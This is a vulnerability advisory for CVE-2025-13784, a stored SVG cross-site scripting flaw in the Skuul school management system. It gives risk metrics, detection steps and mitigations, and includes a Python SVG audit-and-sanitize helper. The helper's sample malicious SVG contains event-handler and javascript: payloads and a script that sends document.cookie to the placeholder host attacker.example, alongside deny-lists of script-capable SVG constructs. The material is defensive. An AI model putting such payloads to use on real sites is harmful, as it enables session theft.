XSS via SVG in yungifez Skuul School Management System (CVE-2025-13784)
Platform
php
Component
yungifez/skuul
Fixed version
2.6.6 (versions 2.6.1 through 2.6.5 remain affected)
A cross-site scripting (XSS) vulnerability, tracked as CVE-2025-13784, has been identified in yungifez Skuul School Management System versions up to 2.6.5. The flaw lies in the SVG File Handler component and is reachable through the /dashboard/schools/1/edit route. Successful exploitation lets an attacker inject script that runs in other users' browsers, potentially compromising their sessions and the integrity of application data. A fix is available in version 2.6.6.
Impact and attack scenarios
This XSS vulnerability allows an attacker to inject arbitrary JavaScript into pages of the Skuul School Management System. The injected script runs in the browser of whoever views the affected content and can be used to hijack sessions, phish credentials, redirect users to attacker-controlled sites, or deface the application. Because the vulnerable route is /dashboard/schools/1/edit, administrators are the most likely victims, and they hold the highest privileges in the system. Note the preconditions from the CVSS vector: the attacker already needs a high-privileged account to plant the payload, and a victim must open the affected page or file. Exploit code is public, which lowers the effort for anyone who meets those preconditions. The impact could extend beyond the application itself to any system reachable with a compromised administrator account.
Exploitation context
This vulnerability has been publicly disclosed and a proof-of-concept exploit is available. The CVE was published on 2025-11-30. The vendor did not respond to early disclosure attempts. The CVSS base score of 2.4 (LOW) reflects the limited impact (a low integrity impact only, with no confidentiality or availability impact) together with the need for a high-privileged account and victim interaction. The public exploit removes the effort of developing a payload but does not change those preconditions, and the EPSS estimate of 0.04% (13th percentile) indicates a low probability of exploitation in the wild.
Who is at risk
Schools and educational institutions running yungifez Skuul School Management System versions prior to 2.6.6 are at risk. Administrators are the most exposed: they hold elevated privileges and routinely use the /dashboard/schools/1/edit page. Multi-tenant and shared-hosting deployments, where many users and schools share one instance, widen the pool of potential victims for a single malicious upload.
Detection steps
• php / web: curl -I https://example.com/dashboard/schools/1/edit | grep -i 'X-XSS-Protection'
  Treat this only as a hygiene check. X-XSS-Protection is a deprecated browser filter hint for reflected XSS and says nothing about whether the SVG handler is vulnerable. The more telling check is against a stored SVG's own URL: whether it is returned as image/svg+xml without Content-Disposition: attachment and without a Content-Security-Policy that blocks script.
• php / web: Examine the controller and view behind the /dashboard/schools/1/edit route for user-controlled input, including uploaded SVG content, that is written to the response without escaping or sanitization.
• generic web: Monitor access logs for unusual requests to /dashboard/schools/1/edit with suspicious parameters, and for uploads of .svg files by unexpected accounts.
• generic web: Inspect the response bodies of the edit page and of served SVG files for unexpected script, event-handler attributes, or redirects.
Attack timeline
- Disclosure
- PoC
Threat intelligence
Exploitation status
EPSS
0.04% (13th percentile)
CISA SSVC
CVSS vector
AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N (base score 2.4, LOW; reconstructed from the metric breakdown below)
What do these metrics mean?
- Attack Vector
- Network: exploitable remotely over the internet; no physical or local access required. Largest attack surface.
- Attack Complexity
- Low: no special conditions are needed; the vulnerability can be exploited reliably.
- Privileges Required
- High: an administrator or otherwise privileged account is required.
- User Interaction
- Required: the victim must open a file, click a link, or visit a crafted page.
- Scope
- Unchanged: the impact is confined to the vulnerable component itself.
- Confidentiality
- None: no confidentiality impact.
- Integrity
- Low: the attacker can modify some data, with limited effect.
- Availability
- None: no availability impact.
Affected software
Package information
- Last updated
- v2.6.4, 9 months ago
Weakness classification (CWE)
Timeline
- Reserved
- Published
- Modified
- EPSS updated
Mitigations and workarounds
The primary mitigation for CVE-2025-13784 is to upgrade to version 2.6.6 or later. If upgrading is not immediately feasible, apply input validation and output encoding to user-supplied data on the /dashboard/schools/1/edit page, and make sure uploaded SVG files are never rendered as documents in the application's origin: serve them with Content-Disposition: attachment, or from a separate origin under a Content-Security-Policy that blocks script. A web application firewall (WAF) tuned to block XSS payloads adds a further layer of defense. Regularly review and sanitize any SVG files already uploaded to the system, since an upgrade does not remove payloads that are already stored.
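The following helpers, added here as an example and not taken from the Skuul project, cover both the detection steps above (auditing stored SVG files, and judging from response headers whether a served SVG can run script, which is what the X-XSS-Protection check cannot tell you) and the review-and-sanitize advice in this section. It uses only the Python standard library; the sample SVGs are constructed for the demonstration and attacker.example is a placeholder host. Note the caveat in the module docstring: xml.etree expands internal entities, so the code rejects any DOCTYPE up front, and a production deployment should parse with defusedxml instead.

```python
"""Audit, sanitize and serving-policy checks for user-uploaded SVG files.
Added example, not code from the Skuul project; standard library only.
xml.etree expands internal entities, so anything with a DOCTYPE is rejected
before parsing. For production use, prefer defusedxml."""
import re
import xml.etree.ElementTree as ET

ET.register_namespace("", "http://www.w3.org/2000/svg")      # emit <svg>, not <ns0:svg>
ET.register_namespace("xlink", "http://www.w3.org/1999/xlink")

# Elements that let an SVG run script or embed arbitrary HTML.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# URL-bearing attributes; SMIL <set>/<animate> can rewrite href through from/to/values.
URL_ATTRS = {"href", "from", "to", "values"}

def _local(name):
    """Drop the '{namespace}' prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1].lower()

def _scripted_url(value):
    """javascript:/vbscript: URLs (ignoring the whitespace tricks browsers tolerate,
    such as 'java\\tscript:') and non-image data: URLs; data:image/... cannot run script."""
    compact = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    if compact.startswith(("javascript:", "vbscript:")):
        return True
    return compact.startswith("data:") and not compact.startswith("data:image/")

def _dangerous_attr(name, value):
    """Reason this attribute can execute script, or None."""
    local = _local(name)
    if local.startswith("on"):                      # onload=, onclick=, onbegin=, ...
        return f"event handler {local}="
    if local in URL_ATTRS and _scripted_url(value):
        return f"scripted URL in {local}="
    return None

def _has_doctype(svg):
    return b"<!DOCTYPE" in svg.upper() or b"<!ENTITY" in svg.upper()

def find_active_content(svg):
    """Audit one SVG document (bytes); one finding per script-capable construct."""
    if _has_doctype(svg):
        return ["DOCTYPE/ENTITY declaration (entity expansion can hide markup)"]
    findings = []
    for el in ET.fromstring(svg).iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element <{tag}>")
        for name, value in el.attrib.items():
            reason = _dangerous_attr(name, value)
            if reason:
                findings.append(f"{reason} on <{tag}>")
    return findings

def _scrub(el):
    for name in list(el.attrib):
        if _dangerous_attr(name, el.attrib[name]):
            del el.attrib[name]
    for child in list(el):
        if _local(child.tag) in ACTIVE_ELEMENTS:
            el.remove(child)
        else:
            _scrub(child)

def sanitize_svg(svg):
    """Copy of the SVG with the constructs above removed. A strict allow-list of tags
    and attributes is safer still; this deny-list only closes the vectors audited above."""
    if _has_doctype(svg):
        raise ValueError("SVG with DOCTYPE/ENTITY declarations is rejected outright")
    root = ET.fromstring(svg)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    _scrub(root)
    return ET.tostring(root)

def svg_response_is_scriptable(headers):
    """Would a browser render a stored SVG with these response headers as a document
    (so its script runs) rather than download it or block script via CSP?
    X-XSS-Protection is ignored on purpose: a deprecated reflected-XSS filter hint
    says nothing about stored SVG content."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip()
    if ctype not in {"image/svg+xml", "application/xml", "text/xml"}:
        return False
    if h.get("content-disposition", "").split(";")[0].strip() == "attachment":
        return False
    directives = {}
    for part in h.get("content-security-policy", "").split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0]] = tokens[1:]
    if "sandbox" in directives and "allow-scripts" not in directives["sandbox"]:
        return False
    return directives.get("script-src", directives.get("default-src")) != ["'none'"]

# Constructed samples, not a real payload from the advisory; attacker.example is a placeholder.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <rect width="10" height="10"/>
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="java&#9;script:alert(1)"><text>click</text></a>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml">html here</body></foreignObject>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
```

To audit an existing deployment, run find_active_content() over every .svg under the upload directory and quarantine anything with findings; to check how the application serves them, feed the headers from a curl -I against one stored SVG's URL into svg_response_is_scriptable(). The sanitizer is a deny-list and deliberately minimal: it removes the constructs the audit reports and nothing else, so pair it with Content-Disposition: attachment or a script-blocking CSP rather than relying on it alone.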
Remediation
Upgrade to a patched version or apply the vendor-provided mitigation, if one exists. Because the vendor has not responded, review the vulnerable code and apply a patch manually to prevent unwanted script execution. Validating and sanitizing SVG file input is essential to prevent XSS attacks.
Frequently asked questions
What is CVE-2025-13784 — XSS in yungifez Skuul School Management System?
CVE-2025-13784 is a cross-site scripting (XSS) vulnerability affecting yungifez Skuul School Management System versions up to 2.6.5, allowing attackers to inject malicious scripts.
Am I affected by CVE-2025-13784 in yungifez Skuul School Management System?
You are affected if you are using yungifez Skuul School Management System versions 2.6.5 or earlier. Upgrade to 2.6.6 or later to mitigate the risk.
How do I fix CVE-2025-13784 in yungifez Skuul School Management System?
The recommended fix is to upgrade to version 2.6.6 or later. Implement input validation and output encoding as a temporary workaround.
Is CVE-2025-13784 being actively exploited?
Not as far as this page records. A public proof-of-concept exists, which lowers the effort for an attacker who already holds a privileged account, but no in-the-wild exploitation is reported and the EPSS estimate is 0.04% (13th percentile).
Where can I find the official yungifez advisory for CVE-2025-13784?
The vendor has not responded to early disclosure attempts. Check the yungifez website and GitHub repository for updates.